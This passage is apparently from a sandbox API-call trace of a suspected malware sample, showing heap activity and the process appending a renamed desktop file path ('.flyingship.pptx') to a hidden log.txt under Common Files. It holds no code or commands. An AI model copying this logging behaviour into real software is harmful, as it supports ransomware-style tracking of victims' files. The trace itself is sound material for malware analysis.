wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.117] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.119] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.119] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0162.119] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.119] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0162.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0162.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.120] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0162.120] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x79e, lpOverlapped=0x0) returned 1 [0162.120] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0162.120] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x79e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.120] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0162.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0162.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0162.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0162.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3e) returned 0x8db138 [0162.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx\r\n", cchWideChar=62, lpMultiByteStr=0x8db138, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx\r\n", lpUsedDefaultChar=0x0) returned 62 [0162.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0162.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.121] WriteFile (in: hFile=0x120, lpBuffer=0x8db180*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db180*, lpNumberOfBytesWritten=0x87f43c*=0x3d, lpOverlapped=0x0) returned 1 [0162.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.121] CloseHandle (hObject=0x120) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0162.122] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0162.122] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0162.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.123] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0162.123] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.123] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0162.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.124] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0162.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0162.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0162.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0162.124] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0162.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0162.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0162.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.127] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, 